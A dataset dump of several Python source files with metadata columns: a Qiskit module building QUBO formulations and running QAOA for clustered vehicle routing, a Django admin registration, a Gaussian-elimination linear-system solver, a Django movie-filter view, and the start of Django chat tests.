    return circuit.assign_parameters(binding, inplace=False)
def to_hamiltonian_dicts(quadratic_program: "QuadraticProgram"):
    """Convert a QUBO-form QuadraticProgram into Ising-Hamiltonian dicts.

    Based on qiskit.optimization.QuadraticProgram.to_ising, using the binary
    substitution x_i = (1 - Z_i) / 2. The constant (identity) offset is not
    tracked. (The annotation is a string so the function can be defined
    without qiskit importable.)

    Args:
        quadratic_program (QuadraticProgram): unconstrained, all-binary QAOA
            problem.

    Returns:
        num_nodes (int): number of qubits.
        linear_terms (defaultdict[int, float]): coefficients of Z_i terms.
        quadratic_terms (defaultdict[Tuple[int, int], float]): coefficients
            of Z_i Z_j (i < j) terms.

    Raises:
        ValueError: if the program has non-binary variables or any
            constraints; convert with QuadraticProgramToQubo first.
    """
    # if problem has variables that are not binary, raise an error
    if quadratic_program.get_num_vars() > quadratic_program.get_num_binary_vars():
        raise ValueError(
            "The type of variable must be a binary variable. "
            "Use a QuadraticProgramToQubo converter to convert "
            "integer variables to binary variables. "
            "If the problem contains continuous variables, "
            "currently we can not apply VQE/QAOA directly. "
            "you might want to use an ADMM optimizer "
            "for the problem. "
        )
    # if constraints exist, raise an error
    if quadratic_program.linear_constraints or quadratic_program.quadratic_constraints:
        raise ValueError(
            "An constraint exists. "
            "The method supports only model with no constraints. "
            "Use a QuadraticProgramToQubo converter. "
            "It converts inequality constraints to equality "
            "constraints, and then, it converters equality "
            "constraints to penalty terms of the object function."
        )
    # initialize Hamiltonian.
    num_nodes = quadratic_program.get_num_vars()
    linear_terms = defaultdict(float)
    quadratic_terms = defaultdict(float)
    # sign == 1 is for minimized problem. sign == -1 is for maximized problem.
    sense = quadratic_program.objective.sense.value
    # Linear objective part: x_i -> (1 - Z_i) / 2.
    for i, coeff in quadratic_program.objective.linear.to_dict().items():
        linear_terms[i] -= sense * coeff / 2
    # Quadratic part: x_i x_j -> (1 - Z_i - Z_j + Z_i Z_j) / 4.
    for pair, coeff in quadratic_program.objective.quadratic.to_dict().items():
        weight = sense * coeff / 4
        i, j = sorted(pair)
        if i != j:
            quadratic_terms[i, j] += weight
        # BUG FIX: the single-Z contributions apply to diagonal (i == j)
        # terms as well (x_i^2 == x_i for binaries); previously they were
        # only added for off-diagonal pairs, silently dropping diagonal
        # coefficients. This matches qiskit's to_ising, which subtracts the
        # weight from both z_i and z_j regardless of i == j.
        linear_terms[i] -= weight
        linear_terms[j] -= weight
    return num_nodes, linear_terms, quadratic_terms
| import base64
import uuid
from collections import defaultdict
from itertools import count
import networkx as nx
import numpy as np
from qiskit import Aer, execute
from qiskit.providers.aer import QasmSimulator
from qiskit.aqua import QuantumInstance, aqua_globals
from qiskit.aqua.algorithms import QAOA, NumPyMinimumEigensolver
from qiskit.aqua.components.optimizers import ADAM, AQGD, COBYLA, NELDER_MEAD
from qiskit.circuit import Parameter
from qiskit.finance.applications.ising import portfolio
from qiskit.optimization import QuadraticProgram
from qiskit.optimization.converters import QuadraticProgramToQubo
from qiskit.optimization.algorithms import (
MinimumEigenOptimizer,
RecursiveMinimumEigenOptimizer,
)
def build_qubos(clusters, depot_info, A=30):
    """A function to build QUBO formulations using qiskit

    Args:
        clusters (list): A list of `networkX` graph objects that contain the
            clusters (including depot)
        depot_info (dict): A dictionary consisting of the depot information
            (must contain an "id" key)
        A (int): A penalty (default is `A=30` as discussed in Feld)

    Returns:
        list: A list of QUBO formulations, one per cluster
    """
    qubos = []
    for subgraph in clusters:
        cluster = clusters[subgraph]
        constrained_qp = QuadraticProgram()
        connected_elems = list(cluster.edges)
        no_nodes = len(cluster.nodes)
        # vars_lookup = create_vars_lookup(cluster, depot_id) Create vars_look_up for indexing
        # Create binary variables "X<node><timestep>" for each non-depot node
        # at each timestep (the depot is implicit start/end and gets none).
        binary_vars = []
        for node in cluster.nodes:
            if node == depot_info["id"]:  # Not including depot
                continue
            for i in range(no_nodes - 1):  # no_timesteps = no_nodes - depot
                binary_vars.append("X" + str(node) + str(i + 1))
        for var in binary_vars:
            constrained_qp.binary_var(var)
        # Calculate objective coefficients (linear and quadratic terms)
        linear = {}
        quadratic = {}
        # Linear cost for travelling from depot to a node in the first and last step
        for edge in connected_elems:
            if edge[0] == depot_info["id"]:
                # Starting node
                start_var = "X" + str(edge[1]) + str(1)
                linear[start_var] = cluster[edge[0]][edge[1]]["cost"]
                # Last node
                last_var = "X" + str(edge[1]) + str(no_nodes - 1)
                linear[last_var] = cluster[edge[0]][edge[1]]["cost"]
            # Allowing for having the depot as the 2nd node on the ordered edge pair (so just reversing the code above)
            elif edge[1] == depot_info["id"]:
                # Starting node
                start_var = "X" + str(edge[0]) + str(1)
                linear[start_var] = cluster[edge[0]][edge[1]]["cost"]
                # Last node
                last_var = "X" + str(edge[0]) + str(no_nodes - 1)
                linear[last_var] = cluster[edge[0]][edge[1]]["cost"]
            else:  # Now quadratic cost for travelling between nodes apart from depot
                for j in range(no_nodes - 2):
                    pairing = (
                        "X" + str(edge[0]) + str(j + 1),
                        "X" + str(edge[1]) + str(j + 2),
                    )
                    quadratic[pairing] = cluster[edge[0]][edge[1]]["cost"]
                    # Backwards directions
                    pairing = (
                        "X" + str(edge[1]) + str(j + 1),
                        "X" + str(edge[0]) + str(j + 2),
                    )
                    quadratic[pairing] = cluster[edge[0]][edge[1]]["cost"]
        for node in cluster.nodes:
            if node == depot_info["id"]:  # Not depot
                continue
            # If node is not connected to the depot, increase cost when starting at that node
            if (depot_info["id"], node) not in connected_elems:
                var = "X" + str(node) + str(1)
                if var in linear:
                    linear[var] += A
                else:
                    linear[var] = A
                # Likewise if the ending node is not connected to the depot
                var = "X" + str(node) + str(no_nodes - 1)
                if var in linear:
                    linear[var] += A
                else:
                    linear[var] = A
            for node2 in cluster.nodes:
                if (
                    node2 != depot_info["id"]
                    and node2 != node
                    and (node, node2) not in cluster.edges
                ):  # Not depot, and different node, and if the two nodes are not connected, add penalty when travelling between them
                    for j in range(no_nodes - 2):
                        # Adding cost for travelling from node to node2,
                        pairing = (
                            "X" + str(node) + str(j + 1),
                            "X" + str(node2) + str(j + 2),
                        )
                        if pairing in quadratic:
                            quadratic[pairing] += A
                        else:
                            quadratic[pairing] = A
                        # Reverse Direction
                        pairing = (
                            "X" + str(node2) + str(j + 1),
                            "X" + str(node) + str(j + 2),
                        )
                        if pairing in quadratic:
                            quadratic[pairing] += A
                        else:
                            quadratic[pairing] = A
        # Input linear and quadratic terms for minimizing qubo objective function
        constrained_qp.minimize(linear=linear, quadratic=quadratic)
        # Now add constraints to make sure each node is visited exactly once:
        # NOTE(review): this block sits outside the `for node in
        # cluster.nodes` loop above, so `node` still holds that loop's last
        # value and only ONE visit-once constraint is created per cluster.
        # It looks like it should be wrapped in its own loop over the
        # non-depot nodes — confirm against the intended formulation.
        node_constraint = {}
        for r in range(no_nodes - 1):
            var = "X" + str(node) + str(r + 1)
            node_constraint[var] = 1
        constrained_qp.linear_constraint(
            linear=node_constraint,
            sense="==",
            rhs=1,
            name="visit_node{}_once".format(node),
        )
        # Now add constraints to make sure each vehicle is only at one node for each timestep:
        for r in range(no_nodes - 1):
            timestep_constraint = {}
            for node in cluster.nodes:
                if node == depot_info["id"]:
                    continue
                var = "X" + str(node) + str(r + 1)
                timestep_constraint[var] = 1
            constrained_qp.linear_constraint(
                linear=timestep_constraint,
                sense="==",
                rhs=1,
                name="timestep{}_one_node".format(r + 1),
            )
        # Convert unconstrained to QUBO
        converter = QuadraticProgramToQubo(penalty=A)
        qubo = converter.convert(constrained_qp)
        # Append each QP to QUBO
        qubos.append(qubo)
    return qubos
def solve_qubo_qaoa(qubo, p, backend, points=None):
    """Solve a QUBO both exactly and with QAOA.

    Args:
        qubo: qiskit QUBO object (QuadraticProgram).
        p (int): number of QAOA layers (the p value).
        backend (str): "statevector_simulator" or "matrix_product_state".
        points: unused; kept for interface compatibility with callers that
            pass a precomputed initial point.

    Returns:
        qaoa_result: result of the QAOA optimisation.
        exact_result: result of the exact NumPy minimum-eigensolver.
        offset (float): constant offset of the Ising Hamiltonian.
        num_qubits (int): number of qubits in the optimal QAOA circuit.
    """
    # Classical reference solution.
    exact_mes = NumPyMinimumEigensolver()
    exact = MinimumEigenOptimizer(exact_mes)
    exact_result = exact.solve(qubo)
    op, offset = qubo.to_ising()
    if backend == "statevector_simulator":
        method = Aer.get_backend("statevector_simulator")
    elif backend == "matrix_product_state":
        method = QasmSimulator(method="matrix_product_state")
    num_qubits = qubo.get_num_vars()
    quantum_instance = QuantumInstance(
        method,
        # Scale shots with problem size; cast to int because backends require
        # an integral shot count (2 ** sqrt(n) is a float).
        shots=int((2 ** np.sqrt(num_qubits)) * 2048),
        seed_simulator=aqua_globals.random_seed,
        seed_transpiler=aqua_globals.random_seed,
    )
    # Random initial angles in [0, 2*pi) for the 2*p parameters.
    qaoa_meas = QAOA(
        quantum_instance=quantum_instance,
        p=p,
        initial_point=list(2 * np.pi * np.random.random(2 * p)),
    )
    qaoa = MinimumEigenOptimizer(qaoa_meas)
    qaoa_result = qaoa.solve(qubo)
    # Report the qubit count of the circuit QAOA actually optimised.
    num_qubits = qaoa.min_eigen_solver.get_optimal_circuit().num_qubits
    return qaoa_result, exact_result, offset, num_qubits
def interp_point(optimal_point):
    """Method to interpolate to next point from the optimal point found from
    the previous layer (the INTERP heuristic).

    Args:
        optimal_point (np.array): Optimal point from previous layer, laid out
            as p gammas followed by p betas.

    Returns:
        point (list): the informed next point, 2 * (p + 1) values.
    """
    optimal_point = list(optimal_point)
    p = int(len(optimal_point) / 2)
    # Pad both halves with zeros so the blend can read one element past
    # either edge.
    gammas = [0] + optimal_point[0:p] + [0]
    betas = [0] + optimal_point[p : 2 * p] + [0]
    interp_gammas = [0] + gammas
    interp_betas = [0] + betas
    # Weighted blend of neighbouring parameters, producing p + 1 values.
    for i in range(1, p + 2):
        interp_gammas[i] = gammas[i - 1] * (i - 1) / p + gammas[i] * (p + 1 - i) / p
        interp_betas[i] = betas[i - 1] * (i - 1) / p + betas[i] * (p + 1 - i) / p
    point = interp_gammas[1 : p + 2] + interp_betas[1 : p + 2]
    return point
def get_fourier_points(last_expectation_value, p):
    """Pad the previous layer's optimal parameters into an initial point for
    the next QAOA layer (FOURIER-style growth).

    Args:
        last_expectation_value (sequence): p gammas followed by p betas.
        p (int): depth of the previous layer.

    Returns:
        list: the previous parameters with a zero appended to each half.
    """
    # The leftover debug print of the points was removed.
    points = (
        list(last_expectation_value[:p]) + [0] + list(last_expectation_value[p:]) + [0]
    )
    return points
def index_to_selection(i, num_assets):
    """Convert a basis-state index into its binary selection vector.

    Args:
        i (int): index of the basis state.
        num_assets (int): number of qubits / assets.

    Returns:
        np.ndarray: length-``num_assets`` 0/1 vector, least significant bit
        first (little-endian).
    """
    bits = "{0:b}".format(i).rjust(num_assets)
    # rjust pads with spaces, which compare unequal to "1" and act as 0.
    # The loop variable no longer shadows the `i` parameter.
    return np.array(
        [1 if bits[pos] == "1" else 0 for pos in reversed(range(num_assets))]
    )
def print_result(qubo, qaoa_result, num_qubits, exact_value, backend):
    """Print measured basis states with objective value and probability, and
    collect the states whose objective equals the known exact optimum.

    Args:
        qubo: qiskit QUBO whose objective is evaluated per state.
        qaoa_result: result returned by MinimumEigenOptimizer.
        num_qubits (int): number of qubits in the QAOA circuit.
        exact_value (float): objective value of the exact optimum.
        backend (str): simulator name; selects probability extraction.

    Returns:
        tuple: (exact_probs, solution_data) for states matching exact_value.
    """
    if backend == "statevector_simulator":
        # Eigenstate may be a raw ndarray or need conversion to a vector.
        eigenvector = (
            qaoa_result.min_eigen_solver_result["eigenstate"]
            if isinstance(qaoa_result.min_eigen_solver_result["eigenstate"], np.ndarray)
            else qaoa_result.min_eigen_solver_result["eigenstate"].to_matrix()
        )
        probabilities = np.abs(eigenvector) ** 2
    elif backend == "matrix_product_state":
        probabilities = []
        # NOTE(review): normalising by a hard-coded 1024 even though the
        # QuantumInstance uses a size-dependent shot count — confirm.
        for eigenstate in qaoa_result.min_eigen_solver_result["eigenstate"]:
            probabilities.append(
                qaoa_result.min_eigen_solver_result["eigenstate"][eigenstate] / 1024
            )
    # Iterate states from most to least probable.
    i_sorted = reversed(np.argsort(probabilities))
    print("----------------- Full result ---------------------")
    print("index\tselection\t\tvalue\t\tprobability")
    print("---------------------------------------------------")
    exact_probs = []
    solution_data = {}
    for index, i in enumerate(i_sorted):
        x = index_to_selection(i, num_qubits)
        probability = probabilities[i]
        # Always show the two most probable states.
        if index == 0 or index == 1:
            print(
                "%d\t%10s\t%.4f\t\t%.4f"
                % (index, x, qubo.objective.evaluate(x), probability)
            )
        # Record (and show) every state attaining the exact optimum.
        if qubo.objective.evaluate(x) == exact_value:
            print(
                "%d\t%10s\t%.4f\t\t%.4f"
                % (index, x, qubo.objective.evaluate(x), probability)
            )
            exact_probs.append(probability)
            solution_data[f"{x}"] = {
                "index": index,
                "energy": qubo.objective.evaluate(x),
                "probability": probability,
            }
    print("\n")
    return exact_probs, solution_data
def assign_parameters(circuit, params_expr, params):
    """Bind numeric values to a circuit's symbolic parameters.

    Args:
        circuit: parameterised circuit exposing ``assign_parameters``.
        params_expr (list): the circuit's Parameter objects, in order.
        params (list): numeric values, one per entry of ``params_expr``.

    Returns:
        A new circuit with every parameter bound (``inplace=False``).
    """
    # Map each symbolic parameter onto its numeric value.
    binding = {params_expr[i]: params[i] for i in range(len(params))}
    return circuit.assign_parameters(binding, inplace=False)
def to_hamiltonian_dicts(quadratic_program: "QuadraticProgram"):
    """Convert a QUBO-form QuadraticProgram into Ising-Hamiltonian dicts.

    Based on qiskit.optimization.QuadraticProgram.to_ising, using the binary
    substitution x_i = (1 - Z_i) / 2. The constant (identity) offset is not
    tracked.

    Args:
        quadratic_program (QuadraticProgram): unconstrained, all-binary
            QAOA problem.

    Returns:
        num_nodes (int): number of qubits.
        linear_terms (defaultdict[int, float]): coefficients of Z_i terms.
        quadratic_terms (defaultdict[Tuple[int, int], float]): coefficients
            of Z_i Z_j (i < j) terms.

    Raises:
        ValueError: if the program has non-binary variables or constraints.
    """
    # if problem has variables that are not binary, raise an error
    if quadratic_program.get_num_vars() > quadratic_program.get_num_binary_vars():
        raise ValueError(
            "The type of variable must be a binary variable. "
            "Use a QuadraticProgramToQubo converter to convert "
            "integer variables to binary variables. "
            "If the problem contains continuous variables, "
            "currently we can not apply VQE/QAOA directly. "
            "you might want to use an ADMM optimizer "
            "for the problem. "
        )
    # if constraints exist, raise an error
    if quadratic_program.linear_constraints or quadratic_program.quadratic_constraints:
        raise ValueError(
            "An constraint exists. "
            "The method supports only model with no constraints. "
            "Use a QuadraticProgramToQubo converter. "
            "It converts inequality constraints to equality "
            "constraints, and then, it converters equality "
            "constraints to penalty terms of the object function."
        )
    # initialize Hamiltonian.
    num_nodes = quadratic_program.get_num_vars()
    linear_terms = defaultdict(float)
    quadratic_terms = defaultdict(float)
    # sign == 1 is for minimized problem. sign == -1 is for maximized problem.
    sense = quadratic_program.objective.sense.value
    # Linear objective part: x_i -> (1 - Z_i) / 2.
    for i, coeff in quadratic_program.objective.linear.to_dict().items():
        linear_terms[i] -= sense * coeff / 2
    # Quadratic part: x_i x_j -> (1 - Z_i - Z_j + Z_i Z_j) / 4.
    for pair, coeff in quadratic_program.objective.quadratic.to_dict().items():
        weight = sense * coeff / 4
        i, j = sorted(pair)
        if i != j:
            quadratic_terms[i, j] += weight
        # BUG FIX: single-Z contributions apply to diagonal (i == j) terms
        # too (x_i^2 == x_i); previously they were only added when i != j,
        # silently dropping diagonal coefficients.
        linear_terms[i] -= weight
        linear_terms[j] -= weight
    return num_nodes, linear_terms, quadratic_terms
| en | 0.742067 | A function to build QUBO formulations using qiskit clusters (list): A list of `networkX` graph objects that contain the clusters (including depot) depot_info (dict): A dictionary consisting of the depot information A (int): A penalty (defualt is `A=30` as discussed in Feld) Returns: list: A list of QUBO formulations # vars_lookup = create_vars_lookup(cluster, depot_id) Create vars_look_up for indexing # Create binary variables for each node at each timestep # Not including depot # no_timesteps = no_nodes - depot # Calculate constraint coefficients (linear and quadratic terms) # Linear cost for travelling from depot to a node in the first and last step # Starting node # Last node # Allowing for having the depot as the 2nd node on the ordered edge pair (so just reversing the code above) # Starting node # Last node # Now quadratic cost for travelling between nodes apart from depot # Backwards directions # Not depot # If node is not connected to the depot, increase cost when starting at that node # Likewise if the ending node is not connected to the depot # Not depot, and different node, and if the two nodes are not connected, add penalty when travelling between them # Adding cost for travelling from node to node2, # Reverse Direction # Input linear and quadratic terms for minimizing qubo objective function # Now add constraints to make sure each node is visited exactly once: # Now add constraints to make sure each vehicle is only at one node for each timestep: # Convert unconstrained to QUBO # Append each QP to QUBO Create QAOA from given qubo, and solves for both the exact value and the QAOA Args: qubo (object): qiskit QUBO object p (int): the number of layers in the QAOA circuit (p value) Returns: exact_result (dict): the exact result of the MinimumEigenOptimizer qaoa_result (dict): the result of running the QAOA Method to interpolate to next point from the optimal point found from the previous layer Args: optimal_point (np.array): Optimal point 
from previous layer Returns: point (list): the informed next point Creates an index for the string value suggestion (used in print_result) Args: i (int): the index of the given string num_assets (int): the number of qubits in the given index string Returns: x (dict): dictionary result of the given index in binary Prints the results of the QAOA in a nice form Args: qubo (object): qiskit QUBO object result (dict): the result of the QAOA num_qubits (int): the number of qubits in the QAOA circuit Args: circuit ([type]): [description] params_expr ([type]): [description] params ([type]): [description] Returns: [type]: [description] # Assign params_expr -> params Converts a Qiskit QuadraticProgram for QAOA to pair of dictionaries representing the Hamiltonian. Based on qiskit.optimization.QuadraticProgram.to_ising. Args: quadratic_program (QuadraticProgram): Qiskit QuadraticProgram representing a QAOA problem Returns: num_nodes (int): Integer number of qubits linear_terms (defaultdict[int, float]): Coefficients of Z_i terms in the Hamiltonian. quadratic_terms (defaultdict[Tuple[int, int], float]): Coefficients of Z_i Z_j terms in the Hamiltonian # if problem has variables that are not binary, raise an error # if constraints exist, raise an error # initialize Hamiltonian. # set a sign corresponding to a maximized or minimized problem. # sign == 1 is for minimized problem. sign == -1 is for maximized problem. # convert linear parts of the object function into Hamiltonian. # create Pauli terms | 2.189062 | 2 |
survey/admin.py | suger-luck/health | 0 | 6617402 | from django.contrib import admin
from survey.models import user, questions
# Register your models here.
# 注册用户类
class UserTabularInline(admin.TabularInline):
    """Show the child-model (questions) records inline on the parent edit
    page, rendered as a table."""
    # Related child model edited inline.
    model = questions
    # NOTE(review): list_display is a ModelAdmin option, not a TabularInline
    # one; to control inline columns use `fields` — confirm intent.
    list_display = ['submit_time']
    # Number of extra blank forms shown for adding new rows.
    extra = 1
class UserAdmin(admin.ModelAdmin):
    """Admin for the user model with its questions editable inline."""
    inlines = [UserTabularInline]
admin.site.register(user, UserAdmin)
admin.site.register(questions) | from django.contrib import admin
from survey.models import user, questions
# Register your models here.
# 注册用户类
class UserTabularInline(admin.TabularInline):
    """Show the child-model (questions) records inline on the parent edit
    page, rendered as a table."""
    # Related child model edited inline.
    model = questions
    # NOTE(review): list_display is a ModelAdmin option, not a TabularInline
    # one; to control inline columns use `fields` — confirm intent.
    list_display = ['submit_time']
    # Number of extra blank forms shown for adding new rows.
    extra = 1
class UserAdmin(admin.ModelAdmin):
    """Admin for the user model with its questions editable inline."""
    inlines = [UserTabularInline]
admin.site.register(user, UserAdmin)
admin.site.register(questions) | zh | 0.772461 | # Register your models here. # 注册用户类 在编辑页中显示子类信息(表格的形式显示) # 关联子类对象 # 显示额外的编辑对象 | 2.079622 | 2 |
hw2/lab2.py | mironalex/CN | 1 | 6617403 | <filename>hw2/lab2.py
from functools import reduce
from hw1.ex12 import solve_ex1
import numpy as np
import random
def solve_diagonal_system(system, result):
    """Solve an upper-triangular linear system by back substitution.

    Args:
        system (np.ndarray): square upper-triangular coefficient matrix.
        result (np.ndarray): right-hand-side column vector of shape (n, 1).

    Returns:
        np.ndarray: solution column vector of shape (n, 1).
    """
    assert len(system.shape) == 2
    assert system.shape[0] == system.shape[1], "Must be a square matrix"
    n = system.shape[0]
    solution = np.zeros((n, 1))
    # Walk from the last row upwards, substituting the already-solved
    # unknowns into each equation.
    for row in range(n - 1, -1, -1):
        known = 0
        for col in range(row + 1, n):
            known += system[row, col] * solution[col, 0]
        solution[row, 0] = (result[row, 0] - known) / system[row][row]
    return solution
def reduce_system(system, result, column=0):
    """Reduce (system, result) in place to upper-triangular form by recursive
    Gaussian elimination with pivoting.

    Args:
        system (np.ndarray): square coefficient matrix, mutated in place.
        result (np.ndarray): right-hand-side column vector, mutated in place.
        column (int): column currently being eliminated (recursion index).
    """
    if column == system.shape[1]:
        return
    # Pivoting: bring the column's largest entry to the diagonal.
    # NOTE(review): argmax picks the maximum VALUE, not the maximum absolute
    # value as classic partial pivoting does — confirm this is intended.
    idx = column + system[column:, column].argmax()
    system[[column, idx]] = system[[idx, column]]
    result[[column, idx]] = result[[idx, column]]
    for line in range(column + 1, system.shape[0]):
        # solve_ex1() supplies the machine-precision threshold; entries that
        # are already (numerically) zero are skipped.
        epsilon = solve_ex1()
        if -epsilon <= system[line, column] <= epsilon:
            continue
        # Scale the row so its pivot-column entry matches, then subtract the
        # pivot row to zero it out; mirror the operation on the RHS.
        normalization_factor = system[column, column] / system[line, column]
        system[line] *= normalization_factor
        system[line] -= system[column]
        result[line, 0] *= normalization_factor
        result[line, 0] -= result[column, 0]
    reduce_system(system, result, column=column + 1)
def solve_system(system, result):
    """Solve system @ x = result via Gaussian elimination followed by back
    substitution. The inputs are copied, so the caller's arrays are not
    modified."""
    internal_system = np.copy(system)
    internal_result = np.copy(result)
    reduce_system(internal_system, internal_result)
    return solve_diagonal_system(internal_system, internal_result)
def generate_random_system(size):
    """Generate a random dense linear system.

    Args:
        size (int): number of equations / unknowns.

    Returns:
        tuple: (system, result) where system is a (size, size) ndarray of
        uniform values in [0, 10) and result is a size-length list of
        single-element lists (a column vector as nested lists).
    """
    # Comprehensions replace the original append loops; same distribution
    # and the same return types as before.
    system = np.array(
        [[random.random() * 10 for _ in range(size)] for _ in range(size)]
    )
    result = [[random.random() * 10] for _ in range(size)]
    return system, result
def flip(vali_list):
    """Flatten a column vector given as [[v0], [v1], ...] into [v0, v1, ...].

    Args:
        vali_list: sequence of single-element sequences.

    Returns:
        list: the first element of each row.
    """
    # Comprehension replaces the original append loop.
    return [row[0] for row in vali_list]
if __name__ == '__main__':
    # Build a random 100x100 system; keep the matrix and RHS separately.
    sys_result_pair = generate_random_system(100)
    system = sys_result_pair[0]
    result = sys_result_pair[1]
    # Reject singular systems before attempting elimination.
    try:
        determinant = np.linalg.det(system)
        if determinant == 0:
            raise ValueError("Error: Determinant is 0")
    except ValueError as error:
        print(repr(error))
        exit(1)
    solution = solve_system(
        system,
        result
    )
    # Reference solution from NumPy, for comparison.
    np_solution = np.linalg.solve(system, result)
    """
    print("Solution =", solution)
    print("NP Solution =", np_solution)
    """
    # Norm of the difference between our solution and NumPy's.
    solution_norm = solution - np_solution
    print("Norma solutia noastra - solutia biblioteca =", np.linalg.norm(solution_norm))
    # Residual of our solution: ||A x - b||.
    solution_mul_sys = np.matmul(system, solution) - result
    print("Norma solutia noastra * sistemul - rezultatul =", np.linalg.norm(solution_mul_sys))
    # Residual of NumPy's solution, for reference.
    np_solution_mul_sys = np.matmul(system, np_solution) - result
    print("Norma solutia biblioteca * sistemul - rezultatul =", np.linalg.norm(np_solution_mul_sys))
    """
    solution_result = np.matmul(system, solution)
    print("A * x_sol =", solution_result)
    print("Result = ", result)
    print("Norm: ", np.linalg.norm(result - solution_result))
    """
| <filename>hw2/lab2.py
from functools import reduce
from hw1.ex12 import solve_ex1
import numpy as np
import random
def solve_diagonal_system(system, result):
    """Back-substitute an upper-triangular square system; returns the (n, 1)
    solution column vector."""
    assert len(system.shape) == 2
    assert system.shape[0] == system.shape[1], "Must be a square matrix"
    solution = np.zeros((system.shape[1], 1))
    lines, columns = system.shape
    # Work upwards from the last row, folding already-solved unknowns into
    # each equation before dividing by the diagonal entry.
    for idx in reversed(range(0, lines)):
        line_offset = reduce(lambda accumulator, comb: accumulator + comb[0] * comb[1],
                             zip(system[idx, idx + 1:], solution[idx + 1:, 0]),
                             0)
        solution[idx, 0] = (result[idx, 0] - line_offset) / system[idx][idx]
    return solution
def reduce_system(system, result, column=0):
    """Reduce (system, result) in place to upper-triangular form by recursive
    Gaussian elimination with pivoting.

    NOTE(review): argmax pivots on the maximum VALUE, not the maximum
    absolute value as classic partial pivoting does — confirm intent.
    """
    if column == system.shape[1]:
        return
    # Swap the pivot row into place (matrix and RHS together).
    idx = column + system[column:, column].argmax()
    system[[column, idx]] = system[[idx, column]]
    result[[column, idx]] = result[[idx, column]]
    for line in range(column + 1, system.shape[0]):
        # solve_ex1() supplies the machine-precision threshold.
        epsilon = solve_ex1()
        if -epsilon <= system[line, column] <= epsilon:
            continue
        # Scale the row to match the pivot entry, then subtract the pivot row.
        normalization_factor = system[column, column] / system[line, column]
        system[line] *= normalization_factor
        system[line] -= system[column]
        result[line, 0] *= normalization_factor
        result[line, 0] -= result[column, 0]
    reduce_system(system, result, column=column + 1)
def solve_system(system, result):
    """Solve system @ x = result via Gaussian elimination plus back
    substitution; inputs are copied and left unmodified."""
    internal_system = np.copy(system)
    internal_result = np.copy(result)
    reduce_system(internal_system, internal_result)
    return solve_diagonal_system(internal_system, internal_result)
def generate_random_system(size):
    """Generate a random dense linear system.

    Args:
        size (int): number of equations / unknowns.

    Returns:
        tuple: ((size, size) ndarray of uniform values in [0, 10),
        size-length list of single-element lists as the RHS column vector).
    """
    # Comprehensions replace the original append loops; same distribution
    # and the same return types as before.
    system = np.array(
        [[random.random() * 10 for _ in range(size)] for _ in range(size)]
    )
    result = [[random.random() * 10] for _ in range(size)]
    return system, result
def flip(vali_list):
    """Flatten a column vector given as [[v0], [v1], ...] into [v0, v1, ...]."""
    # Comprehension replaces the original append loop.
    return [row[0] for row in vali_list]
if __name__ == '__main__':
    # Build a random 100x100 system.
    sys_result_pair = generate_random_system(100)
    system = sys_result_pair[0]
    result = sys_result_pair[1]
    # Reject singular systems before attempting elimination.
    try:
        determinant = np.linalg.det(system)
        if determinant == 0:
            raise ValueError("Error: Determinant is 0")
    except ValueError as error:
        print(repr(error))
        exit(1)
    solution = solve_system(
        system,
        result
    )
    # Reference solution from NumPy, for comparison.
    np_solution = np.linalg.solve(system, result)
    """
    print("Solution =", solution)
    print("NP Solution =", np_solution)
    """
    # Difference norm, then residual norms for both solutions.
    solution_norm = solution - np_solution
    print("Norma solutia noastra - solutia biblioteca =", np.linalg.norm(solution_norm))
    solution_mul_sys = np.matmul(system, solution) - result
    print("Norma solutia noastra * sistemul - rezultatul =", np.linalg.norm(solution_mul_sys))
    np_solution_mul_sys = np.matmul(system, np_solution) - result
    print("Norma solutia biblioteca * sistemul - rezultatul =", np.linalg.norm(np_solution_mul_sys))
    """
    solution_result = np.matmul(system, solution)
    print("A * x_sol =", solution_result)
    print("Result = ", result)
    print("Norm: ", np.linalg.norm(result - solution_result))
    """
| en | 0.411053 | print("Solution =", solution) print("NP Solution =", np_solution) solution_result = np.matmul(system, solution) print("A * x_sol =", solution_result) print("Result = ", result) print("Norm: ", np.linalg.norm(result - solution_result)) | 2.846333 | 3 |
movies/views.py | mikeku1116/django-filter-package | 0 | 6617404 | from django.shortcuts import render
from .models import Movie
from .filters import MovieFilter
def index(request):
    """Render the movie list with a filter form.

    GET shows the unfiltered queryset; POST re-binds the filter to the
    submitted data so the page shows the filtered results.
    """
    movies = Movie.objects.all()
    movieFilter = MovieFilter(queryset=movies)
    if request.method == "POST":
        # Rebind with the submitted criteria, replacing the unbound filter.
        movieFilter = MovieFilter(request.POST, queryset=movies)
    context = {
        'movieFilter': movieFilter
    }
    return render(request, 'movies/index.html', context)
| from django.shortcuts import render
from .models import Movie
from .filters import MovieFilter
def index(request):
    """Render the movie list with a filter form; POST re-binds the filter to
    the submitted data so the page shows the filtered results."""
    movies = Movie.objects.all()
    movieFilter = MovieFilter(queryset=movies)
    if request.method == "POST":
        # Rebind with the submitted criteria, replacing the unbound filter.
        movieFilter = MovieFilter(request.POST, queryset=movies)
    context = {
        'movieFilter': movieFilter
    }
    return render(request, 'movies/index.html', context)
| none | 1 | 1.978744 | 2 | |
hokudai_furima/product/tests.py | TetsuFe/hokuma | 1 | 6617405 | from django.test import TestCase, Client
from django.urls import reverse
from django.utils import timezone
import datetime
from hokudai_furima.account.models import User
from hokudai_furima.product.models import Product
from hokudai_furima.chat.models import Chat, Talk
def create_user(username, email, password):
    """Create and return an active User with the given credentials."""
    user = User.objects.create_user(username=username, email=email, password=password, is_active=True)
    return user
def comfirm_site_rules(user):
    """Mark the user as having accepted the site rules and return it.

    NOTE(review): the name is a typo of "confirm"; renaming would require
    updating every caller, so it is only flagged here.
    """
    user.is_rules_confirmed = True
    user.save()
    return user
def activate_user(user):
    """Set the user active, persist the change and return the user."""
    user.is_active = True
    user.save()
    return user
def create_product(user, title, description, price):
    """Create and return a Product sold by the given user."""
    product = Product.objects.create(seller=user, title=title, description=description, price=price)
    return product
def create_chat(product, product_wanting_user, product_seller):
    """Create and return a Chat about the product between a prospective
    buyer and the seller, timestamped now."""
    chat = Chat.objects.create(product=product,
                               product_wanting_user=product_wanting_user,
                               product_seller=product_seller,
                               created_date=timezone.now())
    return chat
def add_talk_to_chat(talker, chat, sentence, days):
    """Append a Talk to the chat, timestamped `days` days from now.

    Negative `days` values create messages in the past.
    """
    time = timezone.now() + datetime.timedelta(days=days)
    talk = Talk.objects.create(talker=talker, chat=chat, sentence=sentence, created_date=time)
    chat.talk_set.add(talk)
class ProductDirectChatViewTests(TestCase):
    """Tests for the product direct-chat view."""

    def test_two_past_questions(self):
        """
        The direct-chat view exposes every talk of the chat between the
        seller and the interested user to the template.
        """
